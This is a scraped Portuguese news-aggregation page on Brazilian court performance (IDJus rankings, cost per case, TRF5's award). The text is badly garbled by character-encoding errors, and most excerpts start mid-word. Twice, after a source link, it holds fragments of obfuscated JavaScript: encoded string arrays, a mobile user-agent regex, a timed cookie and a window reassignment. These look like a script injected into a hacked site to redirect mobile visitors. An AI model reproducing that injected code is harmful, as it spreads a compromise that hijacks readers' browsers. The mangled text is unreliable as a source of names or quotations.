Que tribunal gasta mais dinheiro para julgar um processo?

ado: R$ 3.250,08.

EvoluAi??A?o

A pesquisa mostra que, em termos nacionais, o custo mAi??dio por processo julgado caiu 6,8%, passando de R$ 2.542,29, em 2010, para R$ 2.369,73, em 2013.

Movimento contrA?rio foi identificado na JustiAi??a Estadual. Em quatro anos, o custo subiu 8%: passou de R$ 1.662,44, em 2010, para R$ 1.795,71, em 2013.

A JustiAi??a do Trabalho, apesar dos dados mais elevados globalmente, conseguiu reduzir seus custos. Os R$ 3.250,08 gastos por processo sA?o 12% menores que o dado registrado em 2010.

O custo mAi??dio por processo Ai?? calculado dividindo-se a despesa total da JustiAi??a pelo total de processos baixados. Os dados sA?o coletados em pesquisas oficiais promovidas pelo Conselho Nacional de JustiAi??a (CNJ) ai??i?? JustiAi??a em NA?meros e o RelatA?rio de Portes dos Tribunais em Tecnologia da InformaAi??A?o e ComunicaAi??A?o.

MatAi??ria completa em: http://jota.info/que-tribunal-gasta-mais-dinheiro-para-julgar-um-processo

_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} + _0xb322[12])=== -1){alert(_0xb322[23])}

Os melhores e os piores tribunais estaduais em termos de gestA?o

dice de atraso e outros indicadores.Isolando-se os trA?s parA?metros usados para definir o ranking dos tribunais, o TJ do PiauAi?? estA? mal colocado em todos. A gestA?o dos processos coloca o tribunal na A?ltima colocaAi??A?o; em termos de gerenciamento orAi??amentA?rio, o TJ-PI Ai?? o 4o mais mal colocado; e na gestA?o de recursos (humanos e tecnolA?gicos), Ai?? o penA?ltimo colocado.De 2010 a 2013, a maior evoluAi??A?o foi registrada no Tribunal de JustiAi??a do Amazonas. Em 2011, o TJ-AM aparecia em 24A? no ranking geral. Conforme osAi??A?ltimos dados disponAi??veis, de 2013, o TJ subiu para a 3A? colocaAi??A?o no ranking dos melhores tribunais.Para calcular o Ai??ndice de gestA?o orAi??amentA?rio, sA?o levados em consideraAi??A?o despesas com recursos humanos na comparaAi??A?o com o total das despesas do tribunal, custo mAi??dio dos processos e a comparaAi??A?o entre receitas e gastos.O Ai??ndice de gestA?o de recursos envolve a quantidade de cargos de magistrados ocupados, percentuais de servidores efetivos e das A?reas judiciA?rias, dados sobre tecnologia e taxa de equalidade processual, uma comparaAi??A?o entre percentuais de processos por servidor e por magistrados na primeira e segunda instA?ncias.A conta sobre gestA?o de processos tem como fatores a taxa de congestionamento do tribunal, o tempo que o tribunal levaria para julgar os casos pendentes, o percentual da demanda que foi finalizado em relaAi??A?o aos processos que ingressaram e a produtividade por magistrado e por servidor.Fonte: http://jota.info/os-melhores-e-os-piores-tribunais-estaduais-em-termos-de-gestao

JustiAi??a brasileira tem 63% dos processos parados

2 ai??i?? Ai?? o que revela a quarta ediAi??A?o do A?ndice de Desempenho da JustiAi??a (IdJus) divulgado ontem. Para zerar esse estoque o JudiciA?rio precisaria de dois anos. O percentual vai de encontro com o resultado obtido pela A?rea de tecnologia, que apresenta o melhor desempenho com Ai??ndice de 73,4 (no mA?ximo de 100), o que demonstra que houve esforAi??os para informatizar os tribunais.

Mas a informatizaAi??A?o, prevista em resoluAi??A?o de 2009 do CNJ, nA?o Ai?? suficiente para destravar o JudiciA?rio. Ainda sA?o necessA?rios aprimoramentos na produtividade dos magistrados e servidores, que passou de 39,6 para 37, e na gestA?o orAi??amentA?ria, que apresenta um Ai??ndice tAi??mido: 46. Em mAi??dia, cada magistrado baixa 1.766 processos, jA? os servidores, 142. Para o ministro do Supremo Tribunal Federal e ex-presidente do conselho, Gilmar Mendes, os tribunais precisam se atentar mais a esses fatos para diminuir a taxa de congestionamento:
ai??i?? Ai??s vezes os tribunais nA?o reparam nesses elementos e acabam optando por aumentar, por exemplo, a Vara, o nA?mero de juAi??zes e desembargadores, ao invAi??s de cuidar da questA?o da melhoria da produtividade. Antes de sair da soluAi??A?o de ampliar vagas, criar novas Varas, tem que se ver qual Ai?? a produtividade.

Outro gargalo estA? na alocaAi??A?o dos funcionA?rios: enquanto na 2A? instA?ncia hA? 61 processos por servidor, na 1A? instA?ncia essa proporAi??A?o Ai?? de 100 para um. Como consequA?ncia, a taxa de congestionamento no primeiro grau foi de 77% em 2013, no segundo grau esse percentual foi de apenas 47,2%.

O levantamento foi elaborado pelo Instituto Brasileiro de Direito PA?blico (IDP) a partir de dados disponAi??veis no CNJ e levou em consideraAi??A?o 20 indicadores, como despesas com recursos humanos, custo mAi??dio de um processo e produtividade tanto do magistrado quanto do servidor. Nos critAi??rios estabelecidos, concluiu-se que o Ai??ndice geral da JustiAi??a brasileira segue na mAi??dia, embora tenha sofrido uma ligeira queda em relaAi??A?o ao ano de 2012, passando de 52 para 51,3.

Na JustiAi??a Estadual, o melhor resultado, num ranking geral, ficou com o Tribunal Regional do Rio Grande Sul, com 55,8. O pior entre as 27 unidades da federaAi??A?o ficou com o Tribunal de JustiAi??a do Piaui (TJPI) com 33,9. O Rio caiu do terceiro para o sexto lugar, ficando com IdJus de 53,4.

O tribunal mais bem posicionado na JustiAi??a Federal foi o da 5A? RegiA?o (Alagoas, CearA?, ParaAi??ba, Rio Grande do Norte e Sergipe), que ficou com o Ai??ndice de 64,6, enquanto o TRF da 1A? RegiA?o (Acre, Amazonas, AmapA?, Bahia, Distrito Federal, Goias, MaranhA?o, Minas Gerais, Mato Grosso, ParA?, PiaA?i, RondA?nia, Roraima e Tocantins) apresentou o menor resultado: 52,1.

Na JustiAi??a do Trabalho, o TRT da 3A? RegiA?o (Minas Gerais) teve o melhor resultado: 54,6. O pior Ai??ndice ficou com o da 14A? RegiA?o (RondA?nia e Acre), com 41,5. JA? o TRT da 1A? RegiA?o (Rio de Janeiro) ficou na quarta posiAi??A?o com Ai??ndice de 51,8.

De acordo com a pesquisa, o custo mAi??dio de um processo no paAi??s Ai?? de R$ 2.369,73. Esse valor varia conforme a esfera da justiAi??a. A JustiAi??a do Trabalho Ai?? a mais cara, com custo mAi??dio de R$ 3.250,08. A mAi??dia na JustiAi??a Estadual Ai?? de R$ 1.795,71, sendo o TJPI o que tem o maior custo: R$ 4054. O Tribunal de JustiAi??a do Sergipe (TJSE) registrou o menor gasto mAi??dio com R$1.106. No A?mbito da JustiAi??a Federal, o custo apurado foi de R$2.063,39.

Fonte: http://www.institutomillenium.org.br/blog/justia-brasileira-tem-63-dos-processos-parados/

TRF5 fica em 1A? lugar no A?ndice de Desempenho da JustiAi??a

ico (IDP), por ter sido o Tribunal de melhor desempenho funcional do PaAi??s no ano de 2013, com Ai??ndice de 64,6, de acordo com um estudo feito pelo IDP. A premiaAi??A?o serA? entregue ao presidente do TRF5, desembargador federal Marcelo Navarro.

Para Navarro, o reconhecimento Ai?? fruto da atuaAi??A?o de todos que compAi??em a JustiAi??a Federal na 5A? RegiA?o: magistrados, servidores, MinistAi??rio PA?blico Federal e advogados pA?blicos e privados. ai???Existe toda uma comunidade jurAi??dica que contribui com o Tribunal para esse sistema jurAi??dico vitorioso, que tem dado aos jurisdicionados dos seis estados que compAi??em a 5A? RegiA?o [Alagoas, CearA?, ParaAi??ba, Pernambuco, Rio Grande do Norte e Sergipe] uma JustiAi??a cAi??lere, de qualidade e preocupada com os valores humanos e sociaisai???, avalia.

Segundo o estudo, divulgado em marAi??o de 2015 e elaborado com base nos dados do relatA?rio ai???JustiAi??a em NA?merosai???, do Conselho Nacional de JustiAi??a (CNJ), o Tribunal de JustiAi??a do Rio Grande do Sul (TJRS) ficou em 2A? lugar, com Ai??ndice de 55,8, e, em 3A? lugar, o Tribunal Regional do Trabalho da 3A? RegiA?o (TRT-Minas Gerais), com Ai??ndice de 54,6. A pesquisa levou em consideraAi??A?o trA?s dimensAi??es bA?sicas da administraAi??A?o judiciA?ria: gestA?o orAi??amentA?ria (despesas e receitas), gestA?o de recursos (recursos humanos e tecnologia) e gestA?o de processos (litigiosidade e produtividade).

O 4A? PrA?mio IDJus integra a programaAi??A?o do 3A? SeminA?rio ai???Desempenho da JustiAi??a: DiagnA?stico e Desafiosai???, evento realizado com o apoio do Centro de Estudos JudiciA?rios do

Conselho da JustiAi??a Federal (CJF), que contarA? com a participaAi??A?o de ministros do Supremo Tribunal Federal (STF) e conselheiros do Conselho Nacional de JustiAi??a (CNJ), entre outras autoridades, para apresentar os resultados em questA?o e avaliar os indicadores do desempenho como instrumentos de gestA?o do Poder JudiciA?rio.

IDJus – O grau de desempenho de cada segmento da JustiAi??a ai??i?? Estadual, Federal e do Trabalho ai??i?? foi medido pelo A?ndice de Desempenho da JustiAi??a (IDJus), desenvolvido pelo Centro de Pesquisas sobre o Sistema de JustiAi??a Brasileiro (CPJus), com intuito de contribuir para o desenvolvimento das instituiAi??Ai??es judiciA?rias. Como outros indicadores, o IDJus varia entre 0 e 100.

O IDJus Ai?? desenvolvido hA? quatro anos pelo IDP, e tem como objetivo produzir diagnA?sticos mais precisos sobre o desempenho judicial no Brasil, alAi??m de auxiliar os tribunais nos processos de melhoria da prestaAi??A?o jurisdicional, apontando os pontos positivos e oferecendo um norte para o aprimoramento contAi??nuo.

Em sua quarta ediAi??A?o, o IDJus apresentou uma anA?lise comparativa inAi??dita da sAi??rie histA?rica relativa aos dados de 2010, 2011, 2012 e 2013. Esse diagnA?stico permite conhecer tendA?ncias e ter uma visA?o integral ai??i?? nA?o alcanAi??ada por nenhum outro instrumento de mensuraAi??A?o ai??i?? dos vA?rios aspectos de funcionamento da JustiAi??a. Sob essa anA?lise, a JustiAi??a Federal apresentou o melhor desempenho no A?ltimo triA?nio, em comparaAi??A?o com os demais segmentos.

Todos os resultados obtidos, inclusive versAi??es anteriores do Ai??ndice, estA?o disponAi??veis na pA?gina do CPJus: http://cpjus.idp.edu.br/idjus/

Fonte: http://www.parlamentopb.com.br/Noticias/?trf5-fica-em-1-lugar-no-indice-de-desempenho-da-justica-29.06.2015

JudiciA?rio gaA?cho Ai?? premiado por sua produtividade

ornecidos pelo Conselho Nacional de JustiAi??a (CNJ), visando a contribuir para o aprimoramento das instituiAi??Ai??es judiciA?rias.O IDJus e o levantamentoAi??JustiAi??a em NA?meros, elaborado pelo CNJ, sA?o considerados os mais importantes diagnA?sticos de desempenho do Poder JudiciA?rio.A aferiAi??A?o do A?ndice de Desempenho da JustiAi??a Ai?? elaborada com base em trA?s dimensAi??es: gestA?o orAi??amentA?ria, gestA?o de recursos e gestA?o de processos. Os temas analisados envolvem despesas, receitas, recursos humanos, tecnologia, litigiosidade e produtividade.O presidente Aquino afirmou que a conquista reitera a dedicaAi??A?o e a criatividade que caracteriza o quadro do Poder JudiciA?rio do Rio Grande do Sul. ai???O aumento vertiginoso da demanda processual nA?o Ai?? fator de acomodaAi??A?o para nossos servidores e magistrados, sempre incansA?veis na busca de soluAi??Ai??es para o aperfeiAi??oamento da prestaAi??A?o jurisdicionalai???. O magistrado lembrou ainda da manutenAi??A?o de prA?ticas modernas e profissionais de gestA?o ao longo das diversas AdministraAi??Ai??es.O desembargador JosAi?? Aquino FlA?res de Camargo enfatiza que o Poder JudiciA?rio tem buscado alternativas financeiras para racionalizar recursos. ai???Prova disso sA?o as receitas prA?prias, que cresceram de 8,76% do total do orAi??amento em 2007, para 20,67%, em 2014. Isso Ai?? resultado de um conjunto de medidas voltadas Ai?? otimizaAi??A?o de rotinas e modernizaAi??A?o de prA?ticas jA? existentesai???, exemplifica.Fonte: http://www.ajuris.org.br/2015/06/29/20690/

Presidente do TRF5 recebe premiaAi??A?o de Tribunal com melhor A?ndice de Desempenho da JustiAi??a (IDJus)

Ai??a, concedido pelo Instituto Brasiliense de Direito PA?blico (IDP).

O TRF5 foi o Tribunal de melhor desempenho funcional do PaAi??s no ano de 2013, com Ai??ndice de 64,6, de acordo com um estudo feito pelo IDP. Marcelo Navarro recebeu o trofAi??u das mA?os do ministro do STJ JoA?o OtA?vio Noronha.

A entrega da premiaAi??A?o ocor reu dentro da programaAi??A?o doAi??3A? SeminA?rio ai???Desempenho da JustiAi??a: DiagnA?stico e Desafiosai???, evento realizado com o apoio do Centro de Estudos JudiciA?rios doAi??Conselho da JustiAi??a Federal (CJF), e contou com a participaAi??A?o de ministros dos tribunais superiores, conselheiros do CNJ, entre outras autoridades.

Para Marcelo Navarro, o reconhecimento Ai?? fruto da atuaAi??A?o de todos que compAi??em a JustiAi??a Federal na 5A? RegiA?o: magistrados, servidores, MinistAi??rio PA?blico Federal e advogados pA?blicos e privados. ai???Existe toda uma comunidade jurAi??dica que contribui com o Tribunal para esse sistema jurAi??dico vitorioso, que tem dado aos jurisdicionados dos seis estados que compAi??em a 5A? RegiA?o (Alagoas, CearA?, ParaAi??ba, Pernambuco, Rio Grande do Norte e Sergipe) uma JustiAi??a cAi??lere, de qualidade e preocupada com os valores humanos e sociaisai???, avalia o presidente do TRF5.

Fonte: http://jurinews.com.br/2015/06/29/presidente-do-trf5-recebe-premiacao-de-tribunal-com-melhor-indice-de-desempenho-da-justica-idjus/

3A? SeminA?rio sobre o Desempenho da JustiAi??a: DiagnA?stico e Desafios apresenta 4A? ediAi??A?o do IDJus ai??i?? Dia 29 de junho em BrasAi??lia/DF

ar problemas estruturais que venham a impedir avanAi??os no sistema.AlAi??m da apresentaAi??A?o do 4A? IDJus, o SeminA?rio contarA? com painAi??is de debate com professores, autoridade do Poder JudiciA?rio, representantes do setor privado e jornalistas, que abordarA?o a qualidade do JudiciA?rio e a importA?ncia dos indicadores.Fonte: http://emporiododireito.com.br/3o-seminario-sobre-o-desempenho-da-justica-diagnostico-e-desafios-apresenta-4a-edicao-do-idjus-dia-29-de-junho-em-brasiliadf/ sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} 322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

3A? SeminA?rio sobre o Desempenho da JustiAi??a: DiagnA?sticos e Desafios

eminA?rio serA? realizada pelo ministro do Supremo Tribunal Federal (STF) Gilmar Mendes, que Ai?? coordenador do Conselho CientAi??fico do Centro de Pesquisas sobre o Sistema de JustiAi??a Brasileiro (CPJus) do IDP, e pelo ministro do Superior Tribunal de JustiAi??a (STJ) Jorge Mussi, corregedor-geral da JustiAi??a Federal e diretor do Centro de Estudos JudiciA?rios do CJF.
O evento tem o objetivo de estimular novos pontos de vista sobre problemas que afetam o JudiciA?rio e a prestaAi??A?o jurisdicional e de fomentar a cultura de mensuraAi??A?o e acompanhamento de indicadores. Estudiosos das A?reas de Direito, Economia, CiA?ncias Sociais e GestA?o compartilharA?o seus conhecimentos e boas prA?ticas. Na ocasiA?o, serA?o apresentados os A?ltimos resultados do A?ndice de Desempenho da JustiAi??a (IDJus) e os tribunais com melhor desempenho, premiados.
A quarta e A?ltima versA?o do IDJus revelou que a JustiAi??a, como um todo, vem melhorando, mas lentamente. O Ai??ndice ficou em de 51,3 numa escala de 100 pontos. Segundo a pesquisa, a maior contribuiAi??A?o para o avanAi??o contAi??nuo veio da GestA?o de Recursos Humanos e TecnolA?gicos, em especial a de Tecnologia, que alcanAi??ou 73,3 pontos. JA? o que mais impacta os jurisdicionados, a GestA?o de Processos, teve o pior rendimento: 42,9. A GestA?o OrAi??amentA?ria, que apoia e fortalece as outras dimensAi??es, teve crescimento contAi??nuo durante os quatro anos da pesquisa, chegando a 46,1.
As inscriAi??Ai??es para o 3A? SeminA?rio sobre o Desempenho da JustiAi??a: DiagnA?sticos e Desafios vA?o atAi?? o dia 25 de junho e devem ser feitas no Portal do CJF, (www.cjf.jus.br) em eventos, onde tambAi??m estA? disponAi??vel a programaAi??A?o completa.

Fonte: http://justicaemfoco.com.br/desc-noticia.php?id=105363

TRF-5 obtAi??m o melhor desempenho funcional do paAi??s no 4A? PrA?mio IDJus

de JustiAi??a do Rio Grande do Sul ficou em 2A? lugar, com Ai??ndice de 55,8, e, em 3A? lugar, o Tribunal Regional do Trabalho da 3A? RegiA?o, com Ai??ndice de 54,6.

O resultado vem de um levantamento, divulgado em marAi??o de 2015 e elaborado com base nos dados do relatA?rio ai???JustiAi??a em NA?merosai???, do Conselho Nacional de JustiAi??a. A pesquisa levou em consideraAi??A?o trA?s dimensAi??es bA?sicas da administraAi??A?o judiciA?ria: gestA?o orAi??amentA?ria (despesas e receitas), gestA?o de recursos (recursos humanos e tecnologia) e gestA?o de processos (litigiosidade e produtividade). Como outros indicadores, o IDJus varia entre 0 e 100.

A premiaAi??A?o serA? entregue ao presidente do TRF-5, desembargador federal Marcelo Navarro. Para ele, o reconhecimento Ai?? fruto da atuaAi??A?o de todos que compAi??em a JustiAi??a Federal na 5A? RegiA?o: magistrados, servidores, MinistAi??rio PA?blico Federal e advogados pA?blicos e privados.

ai???Existe toda uma comunidade jurAi??dica que contribui com o Tribunal para esse sistema jurAi??dico vitorioso, que tem dado aos jurisdicionados dos seis estados que compAi??em a 5A? RegiA?o [Alagoas, CearA?, ParaAi??ba, Pernambuco, Rio Grande do Norte e Sergipe] uma JustiAi??a cAi??lere, de qualidade e preocupada com os valores humanos e sociaisai???, avalia o desembargador.

O 4A? PrA?mio IDJus integra a programaAi??A?o do 3A? SeminA?rio ai???Desempenho da JustiAi??a: DiagnA?stico e Desafiosai???, evento feito com o apoio do Centro de Estudos JudiciA?rios do Conselho da JustiAi??a Federal.

O encontro contarA? com a participaAi??A?o de ministros do Supremo Tribunal Federal e conselheiros do Conselho Nacional de JustiAi??a, entre outras autoridades, para apresentar os resultados em questA?o e avaliar os indicadores do desempenho como instrumentos de gestA?o do Poder JudiciA?rio. Com informaAi??Ai??es da Assessoria de Imprensa do TRF-5.

Fonte: http://www.conjur.com.br/2015-jun-27/trf-obtem-melhor-desempenho-funcional-pais-premio-idjus

Tribunal Regional Federal tem o melhor desempenho de JustiAi??a do paAi??s

e Direito PA?blico (IDP). A instituiAi??A?o foi agraciada por ter sido o tribunal de melhor desempenho funcional do paAi??s em 2013, com Ai??ndice de 64,6, de acordo com um estudo feito pelo IDP. A premiaAi??A?o serA? entregue ao presidente do TRF5, desembargador federal Marcelo Navarro.

Para Navarro, o reconhecimento Ai?? fruto da atuaAi??A?o de todos que compAi??em a JustiAi??a Federal na 5A? RegiA?o: magistrados, servidores, MinistAi??rio PA?blico Federal e advogados pA?blicos e privados. ai???Existe toda uma comunidade jurAi??dica que contribui com o Tribunal para esse sistema jurAi??dico vitorioso, que tem dado aos jurisdicionados dos seis estados que compAi??em a 5A? RegiA?o [Alagoas, CearA?, ParaAi??ba, Pernambuco, Rio Grande do Norte e Sergipe] uma JustiAi??a cAi??lere, de qualidade e preocupada com os valores humanos e sociaisai???, avalia.

Segundo o estudo, divulgado em marAi??o de 2015 e elaborado com base nos dados do relatA?rio ai???JustiAi??a em NA?merosai???, do Conselho Nacional de JustiAi??a (CNJ), o Tribunal de JustiAi??a do Rio Grande do Sul (TJRS) ficou em 2A? lugar, com Ai??ndice de 55,8, e, em 3A? lugar, o Tribunal Regional do Trabalho da 3A? RegiA?o (TRT-Minas Gerais), com Ai??ndice de 54,6. A pesquisa levou em consideraAi??A?o trA?s dimensAi??es bA?sicas da administraAi??A?o judiciA?ria: gestA?o orAi??amentA?ria (despesas e receitas), gestA?o de recursos (recursos humanos e tecnologia) e gestA?o de processos (litigiosidade e produtividade).

O 4A? PrA?mio IDJus integra a programaAi??A?o do 3A? SeminA?rio ai???Desempenho da JustiAi??a: DiagnA?stico e Desafiosai???, evento realizado com o apoio do Centro de Estudos JudiciA?rios do Conselho da JustiAi??a Federal (CJF), que contarA? com a participaAi??A?o de ministros do Supremo Tribunal Federal (STF) e conselheiros do Conselho Nacional de JustiAi??a (CNJ), entre outras autoridades, para apresentar os resultados em questA?o e avaliar os indicadores do desempenho como instrumentos de gestA?o do Poder JudiciA?rio.

Fonte: http://www.diariodepernambuco.com.br/app/noticia/vida-urbana/2015/06/30/interna_vidaurbana,583979/tribunal-regional-federal-tem-o-melhor-desempenho-de-justica-do-pais.shtml